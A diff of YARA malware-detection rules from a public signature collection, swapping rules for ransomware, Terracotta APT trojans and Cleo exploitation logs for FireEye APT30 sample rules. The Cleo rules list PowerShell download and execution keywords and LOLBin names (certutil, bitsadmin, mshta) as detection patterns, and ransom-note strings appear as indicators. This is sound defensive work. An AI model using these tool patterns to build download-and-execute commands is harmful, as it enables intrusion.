+		id = "8a30720b-06da-5a82-8bab-bf06121afd68"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L197-L222"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L962-L977"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a8384c9e3689eb72fa737b570dbb53b2c3d103c62d46747a96e1e1becf14dfea"
-		logic_hash = "6f93bade7709945b478cbdc721d85ad9243d56ace19fba25835cec13a6210dfb"
+		hash = "df48a7cd6c4a8f78f5847bad3776abc0458499a6"
+		logic_hash = "a70d9471215ddcfe84a39b33f53c4114b205aa2cc95cd93081afe442ee2b8b42"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
-		DaysofYARA = "3/100"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x_ext = ".royal_" wide
-		$x_fname = "royal_dll.dll"
-		$s_readme = "README.TXT" wide
-		$s_cli_flag01 = "-networkonly" wide
-		$s_cli_flag02 = "-localonly" wide
-		$x_ransom_msg01 = "If you are reading this, it means that your system were hit by Royal ransomware."
-		$x_ransom_msg02 = "Try Royal today and enter the new era of data security!"
-		$x_onion_site = "http://royal2xthig3ou5hd7zsliqagy6yygk2cdelaxtni2fyad6dpmpxedid.onion/"
+		$s0 = "WhBoyIEXPLORE.EXE.exe" fullword ascii
+		$s5 = "Startup>A" fullword ascii
+		$s18 = "olhelp32Snapshot" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 2 of ( $x* ) or 5 of them )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_PY_Dimorf
+rule SIGNATURE_BASE_APT30_Sample_1 : FILE
 {
 	meta:
-		description = "Detection for Dimorf ransomeware"
-		author = "Silas Cutler"
-		id = "78b53433-6926-58cd-8ec0-2195af803aab"
-		date = "2023-01-03"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/Ort0x36/Dimorf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L224-L242"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L979-L996"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7499b21f77d07364983b94134a60f7c99e71a5392386437d459a196bf71852fb"
+		hash = "8cea83299af8f5ec6c278247e649c9d91d4cf3bc"
+		logic_hash = "5f20b60b8721d62731708630a3443741c956304c553f651572282336995f6d4f"
 		score = 75
 		quality = 85
-		tags = ""
-		version = "1.0"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$func01 = "def find_and_encrypt"
-		$func02 = "def check_os"
-		$comment01 = "checks if the user has permission on the file."
-		$misc01 = "log_dimorf.log"
-		$misc02 = ".dimorf"
+		$s0 = "#hostid" fullword ascii
+		$s1 = "\\Windows\\C" ascii
+		$s5 = "TimUmove" fullword ascii
+		$s6 = "Moziea/4.0 (c" fullword ascii
+		$s7 = "StartupNA" fullword ascii
 
 	condition:
-		all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-
-rule SIGNATURE_BASE_Corkowdll : FILE
+rule SIGNATURE_BASE_APT30_Generic_1 : FILE
 {
 	meta:
-		description = "Rule to detect the Corkow DLL files"
-		author = "Group IB"
-		id = "cc9d2bb3-8db3-54a0-bd05-7f054ce84633"
-		date = "2016-01-02"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4d21f402-24da-5e38-9225-a1461e61802f"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_corkow_dll.yar#L3-L24"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L998-L1031"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "072112c79f20ba08b7ef71d3dacff7eb947b4a27bf6381ce788e229f2f791cdf"
+		logic_hash = "0a2d4e8583286a3f44b49dc902143ee1ea321d26275c6cbcd54876e94b8cd2a3"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "aaa5c64200ff0818c56ebe4c88bcc1143216c536"
+		hash1 = "cb4263cab467845dae9fae427e3bbeb31c6a14c2"
+		hash2 = "b69b95db8a55a050d6d6c0cba13d73975b8219ca"
+		hash3 = "5c29e21bbe8873778f9363258f5e570dddcadeb9"
+		hash4 = "d5cb07d178963f2dea2c754d261185ecc94e09d6"
+		hash5 = "626dcdd7357e1f8329e9137d0f9883f57ec5c163"
+		hash6 = "843997b36ed80d3aeea3c822cb5dc446b6bfa7b9"
 
 	strings:
-		$binary1 = { 60 [0-8] 9C [0-8] BB ?? ?? ?? ?? [0-8] 81 EB ?? ?? ?? ?? [0-8] E8 ?? 00 00 00 [0-8] 58 [0-8] 2B C3 }
-		$binary2 = { (FF 75 ?? | 53) FF 75 10 FF 75 0C FF 75 08 E8 ?? ?? ?? ?? [3-9] C9 C2 0C 00 }
+		$s0 = "%s\\%s.txt" fullword
+		$s1 = "\\ldsysinfo.txt"
+		$s4 = "(Extended Wansung)" fullword
+		$s6 = "Computer Name:" fullword
+		$s7 = "%s %uKB %04u-%02u-%02u %02u:%02u" fullword
+		$s8 = "ASSAMESE" fullword
+		$s9 = "BELARUSIAN" fullword
+		$s10 = "(PR China)" fullword
+		$s14 = "(French)" fullword
+		$s15 = "AdvancedServer" fullword
+		$s16 = "DataCenterServer" fullword
+		$s18 = "(Finland)" fullword
+		$s19 = "%s %04u-%02u-%02u %02u:%02u" fullword
+		$s20 = "(Chile)" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $binary* ) and ( pe.exports ( "Control_RunDLL" ) or pe.exports ( "ServiceMain" ) or pe.exports ( "DllGetClassObject" ) ) or ( pe.exports ( "ServiceMain" ) and pe.exports ( "Control_RunDLL" ) ) )
+		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Apolmy_Privesc_Trojan : FILE
+rule SIGNATURE_BASE_APT30_Generic_2 : FILE
 {
 	meta:
-		description = "Apolmy Privilege Escalation Trojan used in APT Terracotta"
+		description = "FireEye APT30 Report Sample - from many files"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2f3f496b-ebfe-5a6e-89ad-a24af6378fd7"
-		date = "2015-08-04"
+		id = "60d7d661-50e8-5a9b-8366-eda8ff8ad9d4"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_terracotta.yar#L11-L27"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L1032-L1087"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d7bd289e6cee228eb46a1be1fcdc3a2bd5251bc1eafb59f8111756777d8f373d"
-		logic_hash = "8cce828806d5829735d6ac8d28a48c9b016b96b4370b2f3ac139799a9fe13c4a"
-		score = 80
+		logic_hash = "56c9e58298c318b6dff2cce0ab896bb7bdd22429e6015b8fe72b8ad2f1f69d30"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "aba8b9fa213e5e2f1f0404d13fecc20ea8651b57"
+		hash1 = "7f11f5c9475240e5dd2eea7726c9229972cffc1f"
+		hash2 = "94d3f91d1e50ecea729617729013c3d143bf2c3e"
+		hash3 = "7e516ec04f28c76d67b8111ddfe58bbd628362cc"
+		hash4 = "6b27bc0b0460b0a25b45d897ed4f399106c284d9"
+		hash5 = "6df5b4b3da0964153bad22fb1f69483ae8316655"
+		hash6 = "b68bce61dfd8763c3003480ba4066b3cb1ef126e"
+		hash7 = "cc124682246d098740cfa7d20aede850d49b6597"
+		hash8 = "1ef415bca310575944934fc97b0aa720943ba512"
+		hash9 = "0559ab9356dcc869da18b2c96f48b76478c472b3"
+		hash10 = "f15272042a4f9324ad5de884bd50f4072f4bdde3"
+		hash11 = "1d93d5f5463cdf85e3c22c56ed1381957f4efaac"
+		hash12 = "b6f1fb0f8a2fb92a3c60e154f24cfbca1984529f"
+		hash13 = "9967a99a1b627ddb6899919e32a0f544ea498b48"
+		hash14 = "95a3c812ca0ad104f045b26c483495129bcf37ca"
+		hash15 = "bde9a72b2113d18b4fa537cc080d8d8ba1a231e8"
+		hash16 = "ce1f53e06feab1e92f07ed544c288bf39c6fce19"
+		hash17 = "72dae031d885dbf492c0232dd1c792ab4785a2dc"
+		hash18 = "a2ccba46e40d0fb0dd3e1dba160ecbb5440862ec"
+		hash19 = "c8007b59b2d495029cdf5b7b8fc8a5a1f7aa7611"
+		hash20 = "9c6f470e2f326a055065b2501077c89f748db763"
+		hash21 = "af3e232559ef69bdf2ee9cd96434dcec58afbe5a"
+		hash22 = "e72e67ba32946c2702b7662c510cc1242cffe802"
+		hash23 = "8fc0b1618b61dce5f18eba01809301cb7f021b35"
+		hash24 = "6a8159da055dac928ba7c98ea1cdbe6dfb4a3c22"
+		hash25 = "47463412daf0b0a410d3ccbb7ea294db5ff42311"
+		hash26 = "e6efa0ccfddda7d7d689efeb28894c04ebc72be2"
+		hash27 = "43a3fc9a4fee43252e9a570492e4efe33043e710"
+		hash28 = "7406ebef11ca9f97c101b37f417901c70ab514b1"
+		hash29 = "53ed9b22084f89b4b595938e320f20efe65e0409"
 
 	strings:
-		$s1 = "[%d] Failed, %08X" fullword ascii
-		$s2 = "[%d] Offset can not fetched." fullword ascii
-		$s3 = "PowerShadow2011" fullword wide
+		$s0 = "%s\\%s\\KB985109.log" fullword
+		$s1 = "%s\\%s\\KB989109.log" fullword
+		$s2 = "Opera.exe" fullword wide
+		$s3 = "%s:All online success on %u!" fullword
+		$s4 = "%s:list online success on %u!" fullword
+		$s5 = "%s:All online fail!" fullword
+		$s6 = "Copyright Opera Software 1995-" wide
+		$s7 = "%s:list online fail!" fullword
+		$s8 = "OnlineTmp.txt" fullword
+		$s9 = "Opera Internet Browser" fullword wide
+		$s12 = "Opera Software" fullword wide
+		$s15 = "Check lan have done!!!" fullword
+		$s16 = "List End." fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Mithozhan_Trojan : FILE
+rule SIGNATURE_BASE_APT30_Generic_4 : FILE
 {
 	meta:
-		description = "Mitozhan Trojan used in APT Terracotta"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5e2b4e08-1a35-5eb0-8c25-a73d45b0e279"
-		date = "2015-08-04"
+		id = "2b246ae2-ec7d-5813-913e-729e4192da59"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_terracotta.yar#L29-L45"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L1110-L1140"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8553b945e2d4b9f45c438797d6b5e73cfe2899af1f9fd87593af4fd7fb51794a"
-		logic_hash = "a7beb030368cc6e1119617991b68e6fa1bf2d1f6eee28e83fef7862313f19d30"
-		score = 70
+		logic_hash = "d6a45baee2741c5ebb05fc3f17974a041cd37f665df1e67934b0928fc75f37c3"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "bb390f99bfde234bbed59f6a0d962ba874b2396c"
+		hash1 = "b47e20ac5889700438dc241f28f4e224070810d2"
+		hash2 = "a9a50673ac000a313f3ddba55d63d9773b9f4143"
+		hash3 = "ac96d7f5957aef09bd983465c497de24c6d17a92"
 
 	strings:
-		$s1 = "adbrowser" fullword wide
-		$s2 = "IJKLlGdmaWhram0vn36BgIOChYR3L45xcHNydXQvhmloa2ptbH8voYCDTw==" fullword ascii
-		$s3 = "EFGHlGdmaWhrL41sf36BgIOCL6R3dk8=" fullword ascii
+		$s0 = "del NetEagle_Scout.bat" fullword
+		$s1 = "NetEagle_Scout.bat" fullword
+		$s2 = "\\visit.exe"
+		$s3 = "\\System.exe"
+		$s4 = "\\System.dat"
+		$s5 = "\\ieupdate.exe"
+		$s6 = "GOTO ERROR" fullword
+		$s7 = ":ERROR" fullword
+		$s9 = "IF EXIST " fullword
+		$s10 = "ioiocn" fullword
+		$s11 = "SetFileAttribute" fullword
+		$s12 = "le_0*^il" fullword
+		$s13 = "le_.*^il" fullword
+		$s14 = "le_-*^il" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Remoteexec_Tool : FILE
+rule SIGNATURE_BASE_APT30_Generic_5 : FILE
 {
 	meta:
-		description = "Remote Access Tool used in APT Terracotta"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c3262147-3455-554c-88fc-b523352efe7f"
-		date = "2015-08-04"
+		id = "e00a670e-cd95-515f-8109-219ce5121ba4"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_terracotta.yar#L47-L65"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L1142-L1163"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a550131e106ff3c703666f15d55d9bc8c816d1cb9ac1b73c2e29f8aa01e53b78"
-		logic_hash = "951cc65e14c2ff035ccc06d080730b1c25208caa1d30129074a6150557a5cebe"
+		logic_hash = "a9d93d7dbf8c5e97ce77cf3fef4941a01c5b1c6bcee40c6f4ca7117d8aee289e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "cb4833220c508182c0ccd4e0d5a867d6c4e675f8"
+		hash1 = "dfc9a87df2d585c479ab02602133934b055d156f"
+		hash2 = "bf59d5ff7d38ec5ffb91296e002e8742baf24db5"
 
 	strings:
-		$s0 = "cmd.exe /q /c \"%s\"" fullword ascii
-		$s1 = "\\\\.\\pipe\\%s%s%d" fullword ascii
-		$s2 = "This is a service executable! Couldn't start directly." fullword ascii
-		$s3 = "\\\\.\\pipe\\TermHlp_communicaton" fullword ascii
-		$s4 = "TermHlp_stdout" fullword ascii
-		$s5 = "TermHlp_stdin" fullword ascii
+		$s0 = "regsvr32 /s \"%ProgramFiles%\\Norton360\\Engine\\5.1.0.29\\ashelper.dll\"" fullword
+		$s1 = "name=\"ftpserver.exe\"/>" fullword
+		$s2 = "LiveUpdate.EXE" fullword wide
+		$s3 = "<description>FTP Explorer</description>" fullword
+		$s4 = "\\ashelper.dll"
+		$s5 = "LiveUpdate" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 75KB and 4 of ( $s* )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Liudoor_Malware_1 : FILE
+rule SIGNATURE_BASE_APT30_Generic_6 : FILE
 {
 	meta:
-		description = "Liudoor Trojan used in Terracotta APT"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ebd5833e-1f5c-5166-aaba-d0be64829e6c"
-		date = "2015-08-04"
+		id = "dfd104bd-daf4-593a-b161-61f43aec048c"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_terracotta.yar#L69-L89"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L1165-L1186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9ef9fcc5df910e796d8b015396cf37614982ebbf9be6f6a4a8d271d4263a36a9"
-		score = 70
+		logic_hash = "ff7473e43e11e31fe6ad997009834f661a0120317e479184410456c99f72b613"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash1 = "deed6e2a31349253143d4069613905e1dfc3ad4589f6987388de13e33ac187fc"
-		hash2 = "4575e7fc8f156d1d499aab5064a4832953cd43795574b4c7b9165cdc92993ce5"
-		hash3 = "ad1a507709c75fe93708ce9ca1227c5fefa812997ed9104ff9adfec62a3ec2bb"
+		hash0 = "b9aafb575d3d1732cb8fdca5ea226cebf86ea3c9"
+		hash1 = "2c5e347083b77c9ead9e75d41e2fabe096460bba"
+		hash2 = "5d39a567b50c74c4a921b5f65713f78023099933"
 
 	strings:
-		$s1 = "svchostdllserver.dll" fullword ascii
-		$s2 = "SvcHostDLL: RegisterServiceCtrlHandler %S failed" fullword ascii
-		$s3 = "\\nbtstat.exe" ascii
-		$s4 = "DataVersionEx" fullword ascii
+		$s0 = "GetStar" fullword
+		$s1 = ".rdUaS" fullword
+		$s2 = "%sOTwp/&A\\L" fullword
+		$s3 = "a Encrt% Flash Disk" fullword
+		$s4 = "ypeAutoRuChec" fullword
+		$s5 = "NoDriveT" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Liudoor_Malware_2 : FILE
+rule SIGNATURE_BASE_APT30_Generic_7 : FILE
 {
 	meta:
-		description = "Liudoor Trojan used in Terracotta APT"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "30b9d727-ec77-5ead-80dd-6d442478e78b"
-		date = "2015-08-04"
+		id = "bba40092-267b-5231-92f1-f222c9f888ee"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_terracotta.yar#L91-L108"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L1188-L1206"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "12cc72fb147f2d580f9f9e2a9bdfbec3f7b0e977871a27ccc941cd0b1aaa634c"
-		score = 70
+		logic_hash = "b5a272cbeb46be9b120acdbe12d795eddc05765777e4157d818c2b91ea7b782b"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash1 = "f3fb68b21490ded2ae7327271d3412fbbf9d705c8003a195a705c47c98b43800"
-		hash2 = "e42b8385e1aecd89a94a740a2c7cd5ef157b091fabd52cd6f86e47534ca2863e"
+		hash0 = "2415f661046fdbe3eea8cd276b6f13354019b1a6"
+		hash1 = "e814914079af78d9f1b71000fee3c29d31d9b586"
+		hash2 = "0263de239ccef669c47399856d481e3361408e90"
 
 	strings:
-		$s0 = "svchostdllserver.dll" fullword ascii
-		$s1 = "Lpykh~mzCCRv|mplpykCCHvq{phlCC\\jmmzqkIzmlvpqCC" fullword ascii
+		$s1 = "Xjapor_*ata" fullword
+		$s2 = "Xjapor_o*ata" fullword
+		$s4 = "Ouopai" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_Log_Indicators_Dec24 : SCRIPT
+rule SIGNATURE_BASE_APT30_Generic_8 : FILE
 {
 	meta:
-		description = "Detects indicators found in logs during and after Cleo software exploitation (as reported by Huntress in December 2024)"
-		author = "Florian Roth"
-		id = "385042a9-fc8c-5b50-975f-3436a16e6861"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L2-L16"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a6845222-0a3e-5327-a448-36e8d54362a5"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L1207-L1232"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a7e6713a08d7cce00cffba8daa12b251ccc12dc8d5a5f38d568bd5054e3783a2"
+		logic_hash = "2c240d2a35ce3d621d108d03d4e720ddf86e248047fb4dd7f9724e64020caa7f"
 		score = 75
 		quality = 85
-		tags = "SCRIPT"
-
-	strings:
-		$x1 = "Note: Processing autorun file 'autorun\\health" ascii wide
-		$x2 = "60282967-dc91-40ef-a34c-38e992509c2c.xml" ascii wide
-		$x3 = "<Detail level=\"1\">Executing 'cmd.exe /c \"powershell -NonInteractive -EncodedCommand " ascii wide
-
-	condition:
-		1 of them
-}
-rule SIGNATURE_BASE_SUSP_EXPL_Cleo_Exploitation_Log_Indicators_Dec24_1 : FILE
-{
-	meta:
-		description = "Detects indicators found in logs during and after Cleo software exploitation (as reported by Huntress in December 2024)"
-		author = "X__Junior"
-		id = "81daf184-4c38-5d84-899b-9d0de2f39934"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L18-L52"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "481ddd570d0292036b421223ce0f839ece86cc1a97aa226a8b9fbd1d63905d1b"
-		score = 75
-		quality = 83
 		tags = "FILE"
-		hash1 = "786951478a0fc5db24f6e1d8dcc5eaa8880dbd928da97828a61f1f1f0f21e21d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "b47e20ac5889700438dc241f28f4e224070810d2"
+		hash1 = "a9a50673ac000a313f3ddba55d63d9773b9f4143"
+		hash2 = "ac96d7f5957aef09bd983465c497de24c6d17a92"
 
 	strings:
-		$sa1 = "<Thread type=\"AutoRun\" action=" ascii
-		$sa2 = "<Mark date=" ascii
-		$sa3 = "<Event>" ascii
-		$sa4 = "<Command text" ascii
-		$sb1 = "[System.Net.WebRequest]::create" ascii
-		$sb2 = "Invoke-RestMethod" ascii
-		$sb3 = "Invoke-WebRequest" ascii
-		$sb4 = "iwr " ascii
-		$sb5 = "Net.WebClient" ascii
-		$sb6 = "Resume-BitsTransfer" ascii
-		$sb7 = "Start-BitsTransfer" ascii
-		$sb8 = "wget " ascii
-		$sb9 = "WinHttp.WinHttpRequest" ascii
-		$sb10 = ".DownloadFile(" ascii
-		$sb11 = ".DownloadString(" ascii
-		$sb12 = "Bypass" nocase ascii
-		$sb13 = "-EncodedCommand" ascii
-		$sb14 = "-windowstyle hidden" ascii
-		$sb15 = " -enc " ascii
+		$s0 = "Windows NT4.0" fullword
+		$s1 = "Windows NT3.51" fullword
+		$s2 = "%d;%d;%d;%ld;%ld;%ld;" fullword
+		$s3 = "%s %d.%d Build%d %s" fullword
+		$s4 = "MSAFD Tcpip [TCP/IP]" fullword
+		$s5 = "SQSRSS" fullword
+		$s8 = "WM_COMP" fullword
+		$s9 = "WM_MBU" fullword
+		$s11 = "WM_GRID" fullword
+		$s12 = "WM_RBU" fullword
 
 	condition:
-		filesize < 1MB and all of ( $sa* ) and 1 of ( $sb* )
+		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_SUSP_EXPL_Cleo_Exploitation_Log_Indicators_Dec24_2 : FILE
+rule SIGNATURE_BASE_APT30_Generic_9 : FILE
 {
 	meta:
-		description = "Detects indicators found in logs during and after Cleo software exploitation (as reported by Huntress in December 2024)"
-		author = "X__Junior"
-		id = "d215d4a0-1726-58d4-90df-8ec6102effe1"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L54-L89"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cf259f8d-e0a9-579d-93e7-ec14d99faf81"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L1234-L1255"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8debaf2c85ea63501b7a3c2ff8af7a8484f4d6097e073645d808cbd50ef1511a"
-		score = 70
+		logic_hash = "0b30c2f0bd654371bf3ac4f9d4e700e1544b62a6c0a072d506160c443fc5fe9d"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "00d9949832dc3533592c2ce06a403ef19deddce9"
+		hash1 = "27a2b981d4c0bb8c3628bfe990db4619ddfdff74"
+		hash2 = "05f66492c163ec2a24c6a87c7a43028c5f632437"
+		hash3 = "263f094da3f64e72ef8dc3d02be4fb33de1fdb96"
 
 	strings:
-		$sa1 = "<Thread type=\"AutoRun\" action=" ascii
-		$sa2 = "<Mark date=" ascii
-		$sa3 = "<Event>" ascii
-		$sa4 = "<Command text" ascii
-		$sb1 = "wscript" ascii
-		$sb2 = "cscript" ascii
-		$sb3 = "mshta" ascii
-		$sb4 = "certutil" ascii
-		$sb5 = "pwsh" ascii
-		$sb6 = "curl" ascii
-		$sb7 = "msiexec" ascii
-		$sb8 = "taskkill" ascii
-		$sb9 = "regsvr32" ascii
-		$sb10 = "rundll32" ascii
-		$sb11 = "bitsadmin" ascii
-		$sb12 = "whoami" ascii
-		$sb13 = "bcdedit" ascii
-		$sb14 = "systeminfo" ascii
-		$sb15 = "reg " ascii
-		$sb16 = "schtasks" ascii
+		$s0 = "%s\\%s\\$NtRecDoc$" fullword
+		$s1 = "%s(%u)%s" fullword
